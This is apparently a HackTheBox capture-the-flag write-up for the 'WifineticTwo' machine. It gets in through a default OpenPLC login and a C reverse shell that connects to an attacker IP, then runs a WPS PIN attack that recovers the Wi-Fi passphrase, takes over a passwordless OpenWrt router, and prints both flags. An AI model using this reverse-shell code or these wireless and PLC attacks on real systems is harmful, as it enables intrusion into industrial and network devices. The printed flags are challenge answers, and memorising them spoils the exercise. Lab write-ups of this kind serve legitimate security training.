HTB - WifineticTwo [Medium]
TCP Scan
> TARGET=10.129.129.83 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
| 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
8080/tcp open http-proxy syn-ack ttl 63 Werkzeug/1.0.1 Python/2.7.18
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.129.129.83:8080/login
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| content-type: text/html; charset=utf-8
| content-length: 232
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfoG_A.GhQOx-rtXPjtVycbVDqQLuNr21E; Expires=Tue, 19-Mar-2024 21:48:24 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Tue, 19 Mar 2024 21:43:24 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 302 FOUND
| content-type: text/html; charset=utf-8
| content-length: 219
| location: http://0.0.0.0:8080/login
| vary: Cookie
| set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZfoG-A.a0emE6-YjVwOjaYjv22hTUkh7f8; Expires=Tue, 19-Mar-2024 21:48:20 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Tue, 19 Mar 2024 21:43:20 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| content-type: text/html; charset=utf-8
| allow: HEAD, OPTIONS, GET
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfoG-g.GXJeUt0is4lVqxduOK3TCGNt0E8; Expires=Tue, 19-Mar-2024 21:48:22 GMT; HttpOnly; Path=/
| content-length: 0
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Tue, 19 Mar 2024 21:43:22 GMT
| RTSPRequest:
| HTTP/1.1 400 Bad request
| content-length: 90
| cache-control: no-cache
| content-type: text/html
| connection: close
| <html><body><h1>400 Bad request</h1>
| Your browser sent an invalid request.
|_ </body></html>
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
port 8080
- Found OpenPLC
- Default login works
openplc:openplc - dirsearch
> dirsearch -u http://10.129.129.83:8080
[10:53:42] 200 - 4KB - /login
- Found https://www.exploit-db.com/exploits/49803
- The exploit doesn’t work out of the box, so manually exploit it
User
- Login to the webserver
- In ‘/program’ Ensure the Blank Program is lannched
- In ‘/hardware’, update
Blank Linuxwith the following - Then setup a nc listener and start the PLC
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int ignored_bool_inputs[] = {-1};
int ignored_bool_outputs[] = {-1};
int ignored_int_inputs[] = {-1};
int ignored_int_outputs[] = {-1};
void initCustomLayer()
{
}
void updateCustomIn()
{
}
void updateCustomOut()
{
int port = 4444;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("10.10.16.59");
connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/sh", NULL};
execve("/bin/sh", argv, NULL);
}
> cat user.txt
d1f4dcd0c9f63b553162f8e413459f1e
PE
root@attica03:/root# ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifisip link show #List available interfaces
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0@if20: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:16:3e:79:d1:d2 brd ff:ff:ff:ff:ff:ff link-netnsid 0
7: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
root@attica03:/root#
iwconfig #List available interfaces
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
root@attica03:/root# airmon-ng check kill #Kill annoying processes
bash: airmon-ng: command not found
root@attica03:/root# airmon-ng start wlan0 #Monitor mode
bash: airmon-ng: command not found
root@attica03:/root# airmon-ng stop wlan0mon #Managed mode
bash: airmon-ng: command not found
root@attica03:/root# airodump-ng wlan0mon #Scan (default 2.4Ghz)
bash: airodump-ng: command not found
root@attica03:/root# airodump-ng wlan0mon --band a #Scan 5Ghz
bash: airodump-ng: command not found
root@attica03:/root# iwconfig wlan0 mode monitor #Put in mode monitor
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0 ; Device or resource busy.
<0mon mode managed #Quit mode monitor - managed mode
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0mon ; No such device.
<SP\|Authentication\|WPS\|WPA" #Scan available wifis
BSS 02:00:00:00:01:00(on wlan0)
SSID: plcrouter
* Authentication suites: PSK
* SSID List
WPS: * Version: 1.0
- Note SSID
SSID: plcrouter
* Authentication suites: PSK
* SSID List
WPS: * Version: 1.0
- WPS is used, exploit with https://github.com/nikita-yfh/OneShot-C
root@attica03:/root# iw dev wlan0 scan
iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
last seen: 185057.752s [boottime]
TSF: 1710891209235766 usec (19801d, 23:33:29)
freq: 2412
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: plcrouter
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 1
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Supported operating classes:
* current operating class: 81
Extended capabilities:
* Extended Channel Switching
* SSID List
* Operating Mode Notification
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Response Type: 3 (AP)
* UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
* Manufacturer:
* Model:
* Model Number:
* Serial Number:
* Primary Device Type: 0-00000000-0
* Device name:
* Config methods: Label, Display, Keypad
* Version2: 2.0
- compile, upload, run
> curl http://10.10.16.59/oneshot -o oneshot
> chmod +x oneshot
> sudo ./oneshot -i wlan0 -b 02:00:00:00:01:00 -K
[*] Running wpa_supplicant...
[*] Trying pin 12345670...
[*] Scanning...
[*] Authenticating...
[+] Authenticated
[*] Associating with AP...
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response...
[*] Received WPS Message M1
[P] E-Nonce: a0a6bae4f019a2bd19d519ac0d163373
[*] Building Message M2
[P] PKR: a0598617be6c74bb48ade197f78fb10900c3a47ff22502297b462d8b9825d1647a50523e3f214ed382eae63b327da9927228d34fe381f228304a05e6ac20a4d03f0de97f829560a8ceb744f360c93c5099ae97cb2990b4694496f6599ef7f6c3f94b198a531f73ff19e35b93da557a709834bc0dc3f8f9619c1d82c28d22333ccc0ca0714379bbd8881bf6a962c214d373ac0d24fc1604ae5866919ab3fe8792435e8731c219d05fe3f7558831c4e75b883a3936cdd7f6d8d338b84b076f6519
[P] PKE: 4813d0e5b62e8b4b716c683ac30a0953aaaa53881bd46802bc1a9b836f004a68054675c3de7e09a8f612767df984d00c4ab47c96981196161e91ab6752432d33052da48dccb4bbf37818e6563308040268c1e79b7a922753579b753697b1dcba79da0860220fc45db5c16a27d1ef28ed4de3693510c38f9436875fdb13adc95bbc4b33852c4bcd4ac2144cb775201ac527a7a3b090431be210c47a2754f20a7ce3dddc143b79331b1e615714cfbc9f802a78a1c1ba193c77eed711bedb1e0a7e
[P] Authkey: 14e7260163308431168c7956aa1e956c1942bd7938d5285db60078e9de7c0713
[*] Received WPS Message M3
[P] E-Hash1: 35bd90d4201f47f44e00721fe11bad56acb86b011bbee1519b2530f0302aa0a4
[P] E-Hash2: 23e1629863547df1d8a28b4a42cac1add7bcb1fc30edd4c943161edeaf3443c6
[*] Building Message M4
[*] Received WPS Message M5
[*] Building Message M6
[*] Received WPS Message M7
[+] WPS PIN: 12345670
[+] WPA PSK: NoWWEDoKnowWhaTisReal123!
[+] AP SSID: plcrouter
- connect to wifi
# config
network={
ssid="plcrouter"
psk="NoWWEDoKnowWhaTisReal123!"
pin="12345670"
}
or
> wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123!' > config
> wpa_supplicant -i wlan0 -c config -B
> ifconfig wlan0 192.168.1.11 netmask 255.255.255.0
> ifconfig wlan0 up
- login to the gateway
oot@attica02:/root# ssh -o StrictHostKeyChecking=no root@192.168.1.1
ssh -o StrictHostKeyChecking=no root@192.168.1.1
Pseudo-terminal will not be allocated because stdin is not a terminal.
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
OpenWrt 23.05.2, r23630-842932a63d
-----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
id
uid=0(root) gid=0(root)
ls-la
-ash: ls-la: not found
ls -la
drwxr-xr-x 2 root root 4096 Jan 7 21:20 .
drwxr-xr-x 17 root root 4096 Mar 18 11:15 ..
-rw-r----- 2 root root 33 Mar 18 11:15 root.txt
cat root.txt
61dfeb126e3ef1900f2ead7503bca7e4
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack